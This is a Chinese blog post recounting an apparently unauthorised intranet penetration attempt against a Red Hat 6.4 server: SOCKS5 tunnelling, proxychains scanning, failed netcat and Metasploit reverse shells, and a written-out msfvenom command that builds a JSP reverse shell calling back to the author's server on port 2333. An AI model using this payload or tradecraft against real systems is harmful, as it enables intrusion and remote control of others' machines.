版权声明:本文为博主的原创文章,未经博主同意不得转载。

写在前面

每个人都有自己的思路和技巧,以前遇到一些linux的环境。这次找来一个站点来进行内网,写下自己的想法

目标环境

1、linux  2.6.32-358  cpu 架构(x86_64)AND发行版 Red Hat Enterprise Linux Server release 6.4

2、DMZ+防火墙+行为监控,外网开放8080 8084 ...

3、服务器有utibadn用户的权限一枚

Shell具体怎么拿到的就不说了,记录下自己比较思路坎坷的一次内网渗透以作回顾:

外网nmap得到的一些端口指纹

内网ip 10.57.64.54   Mask 255.255.240.0

对比外网从服务器的信息,我们可以发现linux服务器受防火墙限制,外网只能通过8080访问内部,并且内部和12网段的222主机建立链接,这里面内网的情况至少有两个网段以上,打算做正向代理,以它为跳板进行内网渗透 (这里思路是对的,后面直接反弹的话,我的会话会被监控发现并且杀掉)

这里的shell的权限是utibadn ,内核版本: 2.6.32-358  cpu 架构(x86_64)AND发行版 Red Hat Enterprise Linux Server release 6.4 (Santiago)

下面做个正向代理

通过上传我的tunnl脚本,尝试建立sock5代理连接

通过建立sock5隧道,这样我本地的kali和web服务器处于同一个环境。

我开启了我sock5的本地监听,希望接下来能够执行监听本地端口返回一个交互的会话,以便我上传对应的exp提权。

这里我尝试着上传netcat的编译版本,尝试本地监听1234回来一个交互的shell 

Netcat编译后出现 error

也上传了Portmap,试了portmap的模式2也不行,都无法执行监听。

打算用proxychains+nmap对内外的环境进行常规的扫描,通过跳板挖掘其他内网的服务(ssh web ftp)或者存在漏洞的主机。

放在后台扫

为什么我这里不用他反弹一个msf 的session回来呢?(后来确认是DMZ+防火墙+监控是不行的)

我开启我的服务器,尝试msf生成一个elf的反弹马去执行反弹到外网的vps

这里执行后发现分段错误,找了下工具包试着小迪提供的f.c反弹到我外网的vps或者本地的sock5隧道,gcc error!

 
 

这里突然有接收,…美国的地址,但不是我的目标地址,这里的会话很奇怪,有点意思,我猜应该是有人执行我的反弹马测试。 23.30 洗澡睡觉

等到第二天了,到目前早上为止我的cobaltstrike服务器监听的2333没有接收到一个会话(后面确认可能是因为是DMZ+防火墙+监控)。继续翻看一些工具还有博客以及笔记看下有什么可以尝试的,虽然目标不仅仅局限于这个ip,但我还是尝试着从这个shell入手。

没什么用的提权大马。上传php脚本看下,发现不支持php。编译的反弹工具都无法使用。

换了另一种脚本反弹

msfvenom -p java/jsp_jsp_shell_reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=2333 -f raw>shell.jsp

这里直接生成一个shell.jsp,本想上传执行直接返回 meterpreter session的。

哈哈哈,搞了大半天的思路,被内网的行为监控发现端口2333外连并且shell都杀掉了

打算重新再来的,这次打算使用脚本监听正向链接。

外网服务关闭了

仅作记录

版权声明:本文为博主原创文章,未经博主同意不得转载:http://www.cnblogs.com/adislj777/p/6980365.html。

记录一次坎坷的linux内网渗透过程瞎折腾的坑的更多相关文章

  1. Linux内网渗透

    Linux虽然没有域环境,但是当我们拿到一台Linux 系统权限,难道只进行一下提权,捕获一下敏感信息就结束了吗?显然不只是这样的.本片文章将从拿到一个Linux shell开始,介绍Linux内网渗 ...

  2. 3.内网渗透之reGeorg+Proxifier

    aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAAxIAAAE2CAIAAAB6BDOVAAAgAElEQVR4Aey9Z5Aex3X327MRGVzkRH ...

  3. 内网渗透测试思路-FREEBUF

    (在拿到webshell的时候,想办法获取系统信息拿到系统权限) 一.通过常规web渗透,已经拿到webshell.那么接下来作重要的就是探测系统信息,提权,针对windows想办法开启远程桌面连接, ...

  4. [原创]K8 cping 3.0大型内网渗透扫描工具

    [原创]K8 Cscan 大型内网渗透自定义扫描器 https://www.cnblogs.com/k8gege/p/10519321.html Cscan简介:何为自定义扫描器?其实也是插件化,但C ...

  5. [源码]Python简易http服务器(内网渗透大文件传输含下载命令)

    Python简易http服务器源码 import SimpleHTTPServerimport SocketServerimport sysPORT = 80if len(sys.argv) != 2 ...

  6. metasploit渗透测试笔记(内网渗透篇)

    x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行.本地监听即可获得meterpreter shell. r ...

  7. Metasploit 内网渗透篇

    0x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行.本地监听即可获得meterpreter shell. ...

  8. 利用MSF实现三层网络的一次内网渗透

    目标IP192.168.31.207 很明显这是一个文件上传的靶场 白名单限制 各种尝试之后发现这是一个检测文件类型的限制 上传php大马文件后抓包修改其类型为  image/jpeg 上传大马之后发 ...

  9. [内网渗透]lcx端口转发

    0x01 简介 lcx是一款端口转发工具,有三个功能: 第一个功能将本地端口转发到远程主机某个端口上 第二个功能将本地端口转发到本地另一个端口上 第三个功能是进行监听并进行转发使用 Lcx使用的前提是 ...

随机推荐

  1. Android系统篇之—-编写系统服务并且将其编译到系统源码中【转】

    本文转载自:http://www.wjdiankong.cn/android%E7%B3%BB%E7%BB%9F%E7%AF%87%E4%B9%8B-%E7%BC%96%E5%86%99%E7%B3% ...

  2. 希尔排序(Shell Sort)

    一.思路 希尔排序是基于插入排序算法,通过允许不相邻的元素进行交换这一简单的改进,使数组变为局部有序,最终再用插入排序. 希尔排序的思想是使数组中任意间隔h的元素都是有序的.这样的数组被称为h有序数组 ...

  3. STL中流相关的输入输出符和get函数彻底总结:cin、cin.get()、cin.getline()、getline()、gets()等函数的用法

    我的总结: [首先:对于流来说,就把流看成一个中转的仓库,对流进行<<运算或>>运算或者get函数的运算都是指,把“流”中的数据“运送”到“内存变量”中去,还是把内存变量中的数 ...

  4. 仿新浪游戏频道js多栏目全屏下拉菜单导航条

    仿新浪游戏频道js多栏目全屏下拉菜单导航条,新浪,游戏频道,js组件,多栏目,全屏下拉,下拉菜单,导航条.代码下载地址:http://www.huiyi8.com/sc/26765.html更多请访问 ...

  5. 仿联想商城laravel实战---2、后端页面搭建(验证码如何在页面中使用)

    仿联想商城laravel实战---2.后端页面搭建(验证码如何在页面中使用) 一.总结 一句话总结: 放在img里面,img的src就是生产验证码的控制器路径: img src="/admi ...

  6. Memcached 分布式缓存实现原理简介

    摘要 在高并发环境下,大量的读.写请求涌向数据库,此时磁盘IO将成为瓶颈,从而导致过高的响应延迟,因此缓存应运而生.无论是单机缓存还是分布式缓存都有其适应场景和优缺点,当今存在的缓存产品也是数不胜数, ...

  7. 关于c++中char*、char ch[]和string区别

    一.字符串指针: char* ch="hello"; 这里的"hello"是字符串常量,是不可以改变的,即通过ch[0]="s"会编译出错. ...

  8. C++11特性 gcc源码包

    1.下载gcc最新的源码包  2.解压缩 tar -xf gcc-4.9.1.tar.gz 3. cd gcc-4.9.1 4.运行download_prerequisites脚本, ./contri ...

  9. 音频压缩(Speex使用&Opus简介)--转

    博客地址:http://blog.csdn.net/kevindgk GitHub地址:https://github.com/KevinDGK/MyAudioDemo 一简介 二局域网语音配置 三Sp ...

  10. java基础回顾之IO

    Java的IO 是Java运用重要部分之一,涉及到的内容也比较多,容易混淆,一段时间不用,可能就会遗忘,要时常回顾记忆一下: (图片来源于网络) Java 流在处理上分为字符流和字节流. 字符流处理的 ...